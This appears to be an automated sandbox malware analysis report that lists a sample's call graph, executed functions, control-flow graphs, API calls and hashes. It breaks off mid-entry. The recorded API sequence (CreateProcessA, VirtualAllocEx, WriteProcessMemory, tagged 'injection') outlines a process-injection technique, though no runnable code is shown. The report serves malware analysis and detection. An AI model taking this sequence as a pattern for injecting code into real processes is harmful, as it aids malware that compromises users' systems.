6c839e8 46695->46712 46718 6c839d9 46695->46718 46702 4bab320 46699->46702 46700 4ba39a8 DrawTextExW 46701 4bab379 46700->46701 46701->46689 46702->46700 46704 4bab320 46703->46704 46705 4ba39a8 DrawTextExW 46704->46705 46706 4bab379 46705->46706 46706->46689 46708 4ba39d7 46707->46708 46709 6c839e8 DrawTextExW 46708->46709 46710 6c839d9 DrawTextExW 46708->46710 46711 4ba3b70 46708->46711 46709->46711 46710->46711 46716 6c83a27 46712->46716 46729 6c82920 46712->46729 46714 6c83a2b 46714->46698 46716->46714 46724 6c829e0 46716->46724 46717 6c83b35 46717->46698 46719 6c82920 DrawTextExW 46718->46719 46721 6c83a27 46719->46721 46720 6c829e0 DrawTextExW 46723 6c83b35 46720->46723 46721->46720 46722 6c83a2b 46721->46722 46722->46698 46723->46698 46726 6c82a01 46724->46726 46725 6c82a16 46725->46717 46726->46725 46733 6c81c78 46726->46733 46728 6c82a71 46730 6c8293e 46729->46730 46749 6c82950 46729->46749 46754 6c82960 46729->46754 46730->46716 46735 6c81c83 46733->46735 46734 6c82df9 46734->46728 46735->46734 46739 6c838d0 46735->46739 46742 6c838c1 46735->46742 46736 6c82f0b 46736->46728 46740 6c838ed 46739->46740 46745 6c81d8c 46739->46745 46740->46736 46743 6c81d8c DrawTextExW 46742->46743 46744 6c838ed 46743->46744 46744->46736 46746 6c83908 DrawTextExW 46745->46746 46748 6c839ae 46746->46748 46748->46740 46750 6c82955 46749->46750 46751 6c829be 46750->46751 46753 6c829e0 DrawTextExW 46750->46753 46759 6c829d0 46750->46759 46751->46730 46753->46751 46755 6c82991 46754->46755 46756 6c829be 46755->46756 46757 6c829d0 DrawTextExW 46755->46757 46758 6c829e0 DrawTextExW 46755->46758 46756->46730 46757->46756 46758->46756 46761 6c82a01 46759->46761 46760 6c82a16 46760->46751 46761->46760 46762 6c81c78 DrawTextExW 46761->46762 46763 6c82a71 46762->46763 46774 6f2b0d0 46775 6f2b0f6 46774->46775 46776 6f2b25b 46774->46776 46775->46776 46778 6f293b4 46775->46778 46779 6f2b350 PostMessageW 46778->46779 46780 6f2b3bc 46779->46780 46780->46775 46781 4ba4488 46782 4ba33e4 DrawTextExW 46781->46782 46783 4ba449f 46782->46783 46786 4ba28e8 46787 4ba2922 46786->46787 46788 4ba299e 46787->46788 46789 4ba29b3 46787->46789 46794 4ba0d2c 46788->46794 46791 4ba0d2c 3 API calls 46789->46791 46793 4ba29c2 46791->46793 46796 4ba0d37 46794->46796 46795 4ba29a9 46796->46795 46799 4ba37b0 46796->46799 46805 4ba37a0 46796->46805 46811 4ba339c 46799->46811 46802 4ba37d7 46802->46795 46803 4ba37ef CreateIconFromResourceEx 46804 4ba387e 46803->46804 46804->46795 46806 4ba37ca 46805->46806 46807 4ba339c CreateIconFromResourceEx 46805->46807 46808 4ba37d7 46806->46808 46809 4ba37ef CreateIconFromResourceEx 46806->46809 46807->46806 46808->46795 46810 4ba387e 46809->46810 46810->46795 46812 4ba3800 CreateIconFromResourceEx 46811->46812 46813 4ba37ca 46812->46813 46813->46802 46813->46803 46764 86d280 46765 86d2c6 GetCurrentProcess 46764->46765 46767 86d311 46765->46767 46768 86d318 GetCurrentThread 46765->46768 46767->46768 46769 86d355 GetCurrentProcess 46768->46769 46770 86d34e 46768->46770 46771 86d38b 46769->46771 46770->46769 46772 86d3b3 GetCurrentThreadId 46771->46772 46773 86d3e4 46772->46773 46814 6f280a4 46815 6f2808d 46814->46815 46816 6f29e30 12 API calls 46815->46816 46817 6f29e2a 12 API calls 46815->46817 46816->46815 46817->46815 46818 6c81620 46822 6c81658 46818->46822 46826 6c81656 46818->46826 46819 6c8163f 46823 6c81661 46822->46823 46830 6c81698 46823->46830 46824 6c81686 46824->46819 46827 6c81661 46826->46827 46829 6c81698 DrawTextExW 46827->46829 46828 6c81686 46828->46819 46829->46828 46831 6c816ca 46830->46831 46832 6c816db 46830->46832 46831->46824 46833 6c81769 46832->46833 46836 6c81d98 46832->46836 46841 6c81da8 46832->46841 46833->46824 46837 6c81dd0 46836->46837 46838 6c81ed4 46837->46838 46846 6c824b8 46837->46846 46851 6c824a9 46837->46851 46838->46831 46842 6c81dd0 46841->46842 46843 6c81ed4 46842->46843 46844 6c824b8 DrawTextExW 46842->46844 46845 6c824a9 DrawTextExW 46842->46845 46843->46831 46844->46843 46845->46843 46847 6c824ce 46846->46847 46850 6c82920 DrawTextExW 46847->46850 46856 6c82910 46847->46856 46848 6c82544 46848->46838 46850->46848 46852 6c824ce 46851->46852 46854 6c82910 DrawTextExW 46852->46854 46855 6c82920 DrawTextExW 46852->46855 46853 6c82544 46853->46838 46854->46853 46855->46853 46858 6c82950 DrawTextExW 46856->46858 46859 6c82960 DrawTextExW 46856->46859 46857 6c8293e 46857->46848 46858->46857 46859->46857 46948 4ba21c0 46949 4ba21d3 46948->46949 46950 865a7c 2 API calls 46948->46950 46952 868548 46948->46952 46950->46949 46953 868583 46952->46953 46955 86880b 46953->46955 46956 86aec0 2 API calls 46953->46956 46954 868849 46954->46949 46955->46954 46957 86cfa9 2 API calls 46955->46957 46956->46955 46957->46954 46784 86d4c8 DuplicateHandle 46785 86d55e 46784->46785 46860 864668 46861 864672 46860->46861 46865 864758 46860->46865 46870 864204 46861->46870 46863 86468d 46866 86477d 46865->46866 46874 864858 46866->46874 46878 864868 46866->46878 46871 86420f 46870->46871 46886 8659fc 46871->46886 46873 866fe4 46873->46863 46876 86488f 46874->46876 46875 86496c 46876->46875 46882 8645c8 46876->46882 46879 86488f 46878->46879 46880 86496c 46879->46880 46881 8645c8 CreateActCtxA 46879->46881 46881->46880 46883 865cf8 CreateActCtxA 46882->46883 46885 865dbb 46883->46885 46887 865a07 46886->46887 46890 865a1c 46887->46890 46889 867105 46889->46873 46891 865a27 46890->46891 46894 865a4c 46891->46894 46893 8671e2 46893->46889 46895 865a57 46894->46895 46898 865a7c 46895->46898 46897 8672d3 46897->46893 46899 865a87 46898->46899 46901 86880b 46899->46901 46904 86aec0 46899->46904 46900 868849 46900->46897 46901->46900 46908 86cfa9 46901->46908 46913 86aee7 46904->46913 46918 86aef8 46904->46918 46905 86aed6 46905->46901 46909 86cfd9 46908->46909 46911 86cffd 46909->46911 46932 86d168 46909->46932 46936 86d157 46909->46936 46911->46900 46914 86aef8 46913->46914 46922 86afe0 46914->46922 46927 86aff0 46914->46927 46915 86af07 46915->46905 46920 86afe0 GetModuleHandleW 46918->46920 46921 86aff0 GetModuleHandleW 46918->46921 46919 86af07 46919->46905 46920->46919 46921->46919 46923 86b001 46922->46923 46924 86b024 46922->46924 46923->46924 46925 86b228 GetModuleHandleW 46923->46925 46924->46915 46926 86b255 46925->46926 46926->46915 46928 86b024 46927->46928 46929 86b001 46927->46929 46928->46915 46929->46928 46930 86b228 GetModuleHandleW 46929->46930 46931 86b255 46930->46931 46931->46915 46934 86d175 46932->46934 46933 86d1af 46933->46911 46934->46933 46940 86ccd0 46934->46940 46938 86d175 46936->46938 46937 86d1af 46937->46911 46938->46937 46939 86ccd0 2 API calls 46938->46939 46939->46937 46941 86ccdb 46940->46941 46943 86dac0 46941->46943 46944 86cdfc 46941->46944 46943->46943 46945 86ce07 46944->46945 46946 865a7c 2 API calls 46945->46946 46947 86db2f 46946->46947 46947->46943

                                                                        Executed Functions

                                                                        Function 0086D270 Relevance: 6.1, APIs: 4, Instructions: 134threadCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32 ref: 0086D2FE
                                                                        • GetCurrentThread.KERNEL32 ref: 0086D33B
                                                                        • GetCurrentProcess.KERNEL32 ref: 0086D378
                                                                        • GetCurrentThreadId.KERNEL32 ref: 0086D3D1
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.1496995206.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_860000_VWGccZGgix.jbxd
                                                                        Similarity
                                                                        • API ID: Current$ProcessThread
                                                                        • String ID:
                                                                        • API String ID: 2063062207-0
                                                                        • Opcode ID: d5dd0e8fee115b549b38c1def89ddab0ede12acd7ca2f5125537aede468bfc7b
                                                                        • Instruction ID: afb557ff4b9e1d256f068cd4a5e52162cc54a70c8e884abb5890012ea2897d80
                                                                        • Opcode Fuzzy Hash: d5dd0e8fee115b549b38c1def89ddab0ede12acd7ca2f5125537aede468bfc7b
                                                                        • Instruction Fuzzy Hash: E25165B09007498FDB14CFAAD548BEEBBF1FF88304F248059E009A7391D7749944CB66
                                                                        Function 0086D280 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 90 86d280-86d30f GetCurrentProcess 94 86d311-86d317 90->94 95 86d318-86d34c GetCurrentThread 90->95 94->95 96 86d355-86d389 GetCurrentProcess 95->96 97 86d34e-86d354 95->97 98 86d392-86d3ad call 86d451 96->98 99 86d38b-86d391 96->99 97->96 103 86d3b3-86d3e2 GetCurrentThreadId 98->103 99->98 104 86d3e4-86d3ea 103->104 105 86d3eb-86d44d 103->105 104->105
                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32 ref: 0086D2FE
                                                                        • GetCurrentThread.KERNEL32 ref: 0086D33B
                                                                        • GetCurrentProcess.KERNEL32 ref: 0086D378
                                                                        • GetCurrentThreadId.KERNEL32 ref: 0086D3D1
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.1496995206.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_860000_VWGccZGgix.jbxd
                                                                        Similarity
                                                                        • API ID: Current$ProcessThread
                                                                        • String ID:
                                                                        • API String ID: 2063062207-0
                                                                        • Opcode ID: 42929427e1832e990c239ee2fa79d55f722aea74c9060b8e6472a26edb24474a
                                                                        • Instruction ID: 177b1454fbe1451e7eaa8a1263e54a762db37629f36da00eb321acfff18efd0e
                                                                        • Opcode Fuzzy Hash: 42929427e1832e990c239ee2fa79d55f722aea74c9060b8e6472a26edb24474a
                                                                        • Instruction Fuzzy Hash: B25145B0E007099FDB14CFAAD548BEEBBF1FB88314F248459E109A7390D7749944CB66
                                                                        Function 06F27BC7 Relevance: 1.7, APIs: 1, Instructions: 244processCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1050 6f27bc7-6f27c5d 1053 6f27c96-6f27cb6 1050->1053 1054 6f27c5f-6f27c69 1050->1054 1061 6f27cb8-6f27cc2 1053->1061 1062 6f27cef-6f27d1e 1053->1062 1054->1053 1055 6f27c6b-6f27c6d 1054->1055 1056 6f27c90-6f27c93 1055->1056 1057 6f27c6f-6f27c79 1055->1057 1056->1053 1059 6f27c7b 1057->1059 1060 6f27c7d-6f27c8c 1057->1060 1059->1060 1060->1060 1063 6f27c8e 1060->1063 1061->1062 1064 6f27cc4-6f27cc6 1061->1064 1068 6f27d20-6f27d2a 1062->1068 1069 6f27d57-6f27e11 CreateProcessA 1062->1069 1063->1056 1066 6f27cc8-6f27cd2 1064->1066 1067 6f27ce9-6f27cec 1064->1067 1070 6f27cd6-6f27ce5 1066->1070 1071 6f27cd4 1066->1071 1067->1062 1068->1069 1072 6f27d2c-6f27d2e 1068->1072 1082 6f27e13-6f27e19 1069->1082 1083 6f27e1a-6f27ea0 1069->1083 1070->1070 1073 6f27ce7 1070->1073 1071->1070 1074 6f27d30-6f27d3a 1072->1074 1075 6f27d51-6f27d54 1072->1075 1073->1067 1077 6f27d3e-6f27d4d 1074->1077 1078 6f27d3c 1074->1078 1075->1069 1077->1077 1079 6f27d4f 1077->1079 1078->1077 1079->1075 1082->1083 1093 6f27ea2-6f27ea6 1083->1093 1094 6f27eb0-6f27eb4 1083->1094 1093->1094 1095 6f27ea8 1093->1095 1096 6f27eb6-6f27eba 1094->1096 1097 6f27ec4-6f27ec8 1094->1097 1095->1094 1096->1097 1100 6f27ebc 1096->1100 1098 6f27eca-6f27ece 1097->1098 1099 6f27ed8-6f27edc 1097->1099 1098->1099 1101 6f27ed0 1098->1101 1102 6f27eee-6f27ef5 1099->1102 1103 6f27ede-6f27ee4 1099->1103 1100->1097 1101->1099 1104 6f27ef7-6f27f06 1102->1104 1105 6f27f0c 1102->1105 1103->1102 1104->1105 1107 6f27f0d 1105->1107 1107->1107
                                                                        APIs
                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06F27DFE
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.1507000276.0000000006F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F20000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_6f20000_VWGccZGgix.jbxd
                                                                        Similarity
                                                                        • API ID: CreateProcess
                                                                        • String ID:
                                                                        • API String ID: 963392458-0
                                                                        • Opcode ID: c53ebf9166578f54e9d6d28c910304f40fb1c8bd1d9d84ae81e11d23e90da581
                                                                        • Instruction ID: fef6d2457e525467627cd79cf66118bb0271444cc2f4d69afaf5e7b77bae4c19
                                                                        • Opcode Fuzzy Hash: c53ebf9166578f54e9d6d28c910304f40fb1c8bd1d9d84ae81e11d23e90da581
                                                                        • Instruction Fuzzy Hash: 9C915E71D0072ACFEB50DFA8C841BEEBBB2BF44310F1485A9D818A7280DB759985CF91
                                                                        Function 06F27BC8 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1108 6f27bc8-6f27c5d 1110 6f27c96-6f27cb6 1108->1110 1111 6f27c5f-6f27c69 1108->1111 1118 6f27cb8-6f27cc2 1110->1118 1119 6f27cef-6f27d1e 1110->1119 1111->1110 1112 6f27c6b-6f27c6d 1111->1112 1113 6f27c90-6f27c93 1112->1113 1114 6f27c6f-6f27c79 1112->1114 1113->1110 1116 6f27c7b 1114->1116 1117 6f27c7d-6f27c8c 1114->1117 1116->1117 1117->1117 1120 6f27c8e 1117->1120 1118->1119 1121 6f27cc4-6f27cc6 1118->1121 1125 6f27d20-6f27d2a 1119->1125 1126 6f27d57-6f27e11 CreateProcessA 1119->1126 1120->1113 1123 6f27cc8-6f27cd2 1121->1123 1124 6f27ce9-6f27cec 1121->1124 1127 6f27cd6-6f27ce5 1123->1127 1128 6f27cd4 1123->1128 1124->1119 1125->1126 1129 6f27d2c-6f27d2e 1125->1129 1139 6f27e13-6f27e19 1126->1139 1140 6f27e1a-6f27ea0 1126->1140 1127->1127 1130 6f27ce7 1127->1130 1128->1127 1131 6f27d30-6f27d3a 1129->1131 1132 6f27d51-6f27d54 1129->1132 1130->1124 1134 6f27d3e-6f27d4d 1131->1134 1135 6f27d3c 1131->1135 1132->1126 1134->1134 1136 6f27d4f 1134->1136 1135->1134 1136->1132 1139->1140 1150 6f27ea2-6f27ea6 1140->1150 1151 6f27eb0-6f27eb4 1140->1151 1150->1151 1152 6f27ea8 1150->1152 1153 6f27eb6-6f27eba 1151->1153 1154 6f27ec4-6f27ec8 1151->1154 1152->1151 1153->1154 1157 6f27ebc 1153->1157 1155 6f27eca-6f27ece 1154->1155 1156 6f27ed8-6f27edc 1154->1156 1155->1156 1158 6f27ed0 1155->1158 1159 6f27eee-6f27ef5 1156->1159 1160 6f27ede-6f27ee4 1156->1160 1157->1154 1158->1156 1161 6f27ef7-6f27f06 1159->1161 1162 6f27f0c 1159->1162 1160->1159 1161->1162 1164 6f27f0d 1162->1164 1164->1164
                                                                        APIs
                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06F27DFE
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.1507000276.0000000006F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F20000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_6f20000_VWGccZGgix.jbxd
                                                                        Similarity
                                                                        • API ID: CreateProcess
                                                                        • String ID:
                                                                        • API String ID: 963392458-0
                                                                        • Opcode ID: 978856e5926e18854b02e2d798fb6c4f851c699b55ee1b97dd086cccd25ad142
                                                                        • Instruction ID: ee3a3bc07df29b569fb119d62fafc1e0b32d829a547a65764158e6e4a54e5ee3
                                                                        • Opcode Fuzzy Hash: 978856e5926e18854b02e2d798fb6c4f851c699b55ee1b97dd086cccd25ad142
                                                                        • Instruction Fuzzy Hash: AD915E71D0072ACFEB50DFA8C8417EEBBB2BF44310F1485A9D818A7280DB759985CF91
                                                                        Function 0086AFF0 Relevance: 1.7, APIs: 1, Instructions: 197COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1165 86aff0-86afff 1166 86b001-86b00e call 86a9b4 1165->1166 1167 86b02b-86b02f 1165->1167 1173 86b024 1166->1173 1174 86b010 1166->1174 1169 86b043-86b084 1167->1169 1170 86b031-86b03b 1167->1170 1176 86b086-86b08e 1169->1176 1177 86b091-86b09f 1169->1177 1170->1169 1173->1167 1220 86b016 call 86b288 1174->1220 1221 86b016 call 86b279 1174->1221 1176->1177 1178 86b0c3-86b0c5 1177->1178 1179 86b0a1-86b0a6 1177->1179 1181 86b0c8-86b0cf 1178->1181 1182 86b0b1 1179->1182 1183 86b0a8-86b0af call 86a9c0 1179->1183 1180 86b01c-86b01e 1180->1173 1184 86b160-86b220 1180->1184 1187 86b0d1-86b0d9 1181->1187 1188 86b0dc-86b0e3 1181->1188 1185 86b0b3-86b0c1 1182->1185 1183->1185 1215 86b222-86b225 1184->1215 1216 86b228-86b253 GetModuleHandleW 1184->1216 1185->1181 1187->1188 1191 86b0e5-86b0ed 1188->1191 1192 86b0f0-86b0f9 call 86a9d0 1188->1192 1191->1192 1196 86b106-86b10b 1192->1196 1197 86b0fb-86b103 1192->1197 1198 86b10d-86b114 1196->1198 1199 86b129-86b136 1196->1199 1197->1196 1198->1199 1201 86b116-86b126 call 86a9e0 call 86a9f0 1198->1201 1206 86b138-86b156 1199->1206 1207 86b159-86b15f 1199->1207 1201->1199 1206->1207 1215->1216 1217 86b255-86b25b 1216->1217 1218 86b25c-86b270 1216->1218 1217->1218 1220->1180 1221->1180
                                                                        APIs
                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0086B246
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.1496995206.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_860000_VWGccZGgix.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModule
                                                                        • String ID:
                                                                        • API String ID: 4139908857-0
                                                                        • Opcode ID: 6d7fb81644768e9579ee3b9ea79a82db48e15c36d9fb993f944a4eddbf1225ea
                                                                        • Instruction ID: c0760fb552f4d7bf153ed1e7abe36a0ab875c3f2eece4480559031f8d50bcdf8
                                                                        • Opcode Fuzzy Hash: 6d7fb81644768e9579ee3b9ea79a82db48e15c36d9fb993f944a4eddbf1225ea
                                                                        • Instruction Fuzzy Hash: D2716570A00B048FD724DF6AD4517ABBBF5FF88304F108929D49AD7A40DB35E889CB92
                                                                        Function 00865CEC Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1222 865cec-865db9 CreateActCtxA 1224 865dc2-865e1c 1222->1224 1225 865dbb-865dc1 1222->1225 1232 865e1e-865e21 1224->1232 1233 865e2b-865e2f 1224->1233 1225->1224 1232->1233 1234 865e40 1233->1234 1235 865e31-865e3d 1233->1235 1237 865e41 1234->1237 1235->1234 1237->1237
                                                                        APIs
                                                                        • CreateActCtxA.KERNEL32(?), ref: 00865DA9
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.1496995206.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_860000_VWGccZGgix.jbxd
                                                                        Similarity
                                                                        • API ID: Create
                                                                        • String ID:
                                                                        • API String ID: 2289755597-0
                                                                        • Opcode ID: 3a3636d9bb94ec62383906cdefdd15a1b1ef6c1d09edf4db2d154a25de1f3ea9
                                                                        • Instruction ID: 4a5df9cc967f3095f95d2a6d89640fd7e859fecabd7c1f9dd34445378960855d
                                                                        • Opcode Fuzzy Hash: 3a3636d9bb94ec62383906cdefdd15a1b1ef6c1d09edf4db2d154a25de1f3ea9
                                                                        • Instruction Fuzzy Hash: 2641C1B0C00719CBEB24DFA9C844BDEFBB5BF49304F20816AD448AB255DB765946CF50
                                                                        Function 008645C8 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1238 8645c8-865db9 CreateActCtxA 1241 865dc2-865e1c 1238->1241 1242 865dbb-865dc1 1238->1242 1249 865e1e-865e21 1241->1249 1250 865e2b-865e2f 1241->1250 1242->1241 1249->1250 1251 865e40 1250->1251 1252 865e31-865e3d 1250->1252 1254 865e41 1251->1254 1252->1251 1254->1254
                                                                        APIs
                                                                        • CreateActCtxA.KERNEL32(?), ref: 00865DA9
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.1496995206.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_860000_VWGccZGgix.jbxd
                                                                        Similarity
                                                                        • API ID: Create
                                                                        • String ID:
                                                                        • API String ID: 2289755597-0
                                                                        • Opcode ID: 8f9b8df8068bf0cc483f8391a0209f4245dae9970d87a0e322f60c54291ae8e9
                                                                        • Instruction ID: bdbf9fe436f33e0207c80883701472f634a34454f5e93ca18c7d808aebe41568
                                                                        • Opcode Fuzzy Hash: 8f9b8df8068bf0cc483f8391a0209f4245dae9970d87a0e322f60c54291ae8e9
                                                                        • Instruction Fuzzy Hash: CD41D0B0C00B19CBEB24DFA9C844B8EFBF5BF49304F20816AD408AB255DB766945CF90
                                                                        Function 06F2793A Relevance: 1.6, APIs: 1, Instructions: 88injectionCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1255 6f2793a-6f2793d 1256 6f27909-6f27929 1255->1256 1257 6f2793f-6f2798e 1255->1257 1262 6f27990-6f2799c 1257->1262 1263 6f2799e-6f279dd WriteProcessMemory 1257->1263 1262->1263 1265 6f279e6-6f27a16 1263->1265 1266 6f279df-6f279e5 1263->1266 1266->1265
                                                                        APIs
                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06F279D0
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.1507000276.0000000006F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F20000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_6f20000_VWGccZGgix.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryProcessWrite
                                                                        • String ID:
                                                                        • API String ID: 3559483778-0
                                                                        • Opcode ID: e942578705fa88a2df0217a9819b2c9f5570ab5164130041f9937423eb630b70
                                                                        • Instruction ID: 4f25deef4d676f440de781d395603fb1d7b00dc19364427774423b84cf5a6474
                                                                        • Opcode Fuzzy Hash: e942578705fa88a2df0217a9819b2c9f5570ab5164130041f9937423eb630b70
                                                                        • Instruction Fuzzy Hash: B0314776D00319DFDB10DFAAD841BDEBBF5FF88220F14842AE559A7240C7759910CBA0
                                                                        Function 04BA37B0 Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1270 4ba37b0-4ba37d5 call 4ba339c 1273 4ba37ea-4ba387c CreateIconFromResourceEx 1270->1273 1274 4ba37d7-4ba37e7 1270->1274 1277 4ba387e-4ba3884 1273->1277 1278 4ba3885-4ba38a2 1273->1278 1277->1278
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.1505472063.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_4ba0000_VWGccZGgix.jbxd
                                                                        Similarity
                                                                        • API ID: CreateFromIconResource
                                                                        • String ID:
                                                                        • API String ID: 3668623891-0
                                                                        • Opcode ID: 68d78fa99e87f6dadc04abd7015785654ac94e57623dfc9f1386609eed6f2185
                                                                        • Instruction ID: 20a0ce31a555e89c30912a8df9d8105c4d3d303d82cae1e0cab7bbce379fd890
                                                                        • Opcode Fuzzy Hash: 68d78fa99e87f6dadc04abd7015785654ac94e57623dfc9f1386609eed6f2185
                                                                        • Instruction Fuzzy Hash: 1F317C71904348DFDB11CFA9D844AEEBFF9EF49310F14809AE954A7221C336D850DBA1
                                                                        Function 06F27878 Relevance: 1.6, APIs: 1, Instructions: 74memoryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1281 6f27878-6f2787d 1282 6f27849-6f2784b 1281->1282 1283 6f2787f-6f278fb VirtualAllocEx 1281->1283 1284 6f27855 1282->1284 1285 6f2784d-6f27853 1282->1285 1292 6f27904-6f27929 1283->1292 1293 6f278fd-6f27903 1283->1293 1287 6f27858-6f2786d 1284->1287 1285->1287 1293->1292
                                                                        APIs
                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06F278EE
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.1507000276.0000000006F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F20000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_6f20000_VWGccZGgix.jbxd
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID:
                                                                        • API String ID: 4275171209-0
                                                                        • Opcode ID: cec47c3c5fce10fc5898600037f87521c4bafbef7e4d4cc0e7ad6efbdf9db765
                                                                        • Instruction ID: 4d8cbacb2e68c30f6099f0024f45309cceaa7fdb0f7ba37e3ac49a37360412d7
                                                                        • Opcode Fuzzy Hash: cec47c3c5fce10fc5898600037f87521c4bafbef7e4d4cc0e7ad6efbdf9db765
                                                                        • Instruction Fuzzy Hash: 03217A35D00259DFDB20DFAAD840ADEBBF5EF48310F24841AE519A7210C735A900CFA1
                                                                        Function 06C83900 Relevance: 1.6, APIs: 1, Instructions: 73COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1297 6c83900-6c83954 1298 6c8395f-6c8396e 1297->1298 1299 6c83956-6c8395c 1297->1299 1300 6c83970 1298->1300 1301 6c83973-6c839ac DrawTextExW 1298->1301 1299->1298 1300->1301 1302 6c839ae-6c839b4 1301->1302 1303 6c839b5-6c839d2 1301->1303 1302->1303
                                                                        APIs
                                                                        • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,06C838ED,?,?), ref: 06C8399F
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.1506391085.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_6c80000_VWGccZGgix.jbxd
                                                                        Similarity
                                                                        • API ID: DrawText
                                                                        • String ID:
                                                                        • API String ID: 2175133113-0
                                                                        • Opcode ID: f3f896390d62a6f2362b32faf3ac11ddc50b81472ef7c9ea8708d0b4c2c64c30
                                                                        • Instruction ID: 78274b0183f0309b23f27fc36964fb1c1698e6f3d02f98f566149fbcc205a9e8
                                                                        • Opcode Fuzzy Hash: f3f896390d62a6f2362b32faf3ac11ddc50b81472ef7c9ea8708d0b4c2c64c30
                                                                        • Instruction Fuzzy Hash: 793122B5D002499FDB10CFAAD884ADEFBF5EF48320F14842AE819A7210D7749904CFA0
                                                                        Function 06C81D8C Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1306 6c81d8c-6c83954 1308 6c8395f-6c8396e 1306->1308 1309 6c83956-6c8395c 1306->1309 1310 6c83970 1308->1310 1311 6c83973-6c839ac DrawTextExW 1308->1311 1309->1308 1310->1311 1312 6c839ae-6c839b4 1311->1312 1313 6c839b5-6c839d2 1311->1313 1312->1313
                                                                        APIs
                                                                        • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,06C838ED,?,?), ref: 06C8399F
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.1506391085.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_6c80000_VWGccZGgix.jbxd
                                                                        Similarity
                                                                        • API ID: DrawText
                                                                        • String ID:
                                                                        • API String ID: 2175133113-0
                                                                        • Opcode ID: 2017e99efdc780cc082693ff11056fcc503a1793e40b41b7078386becf6a7a48
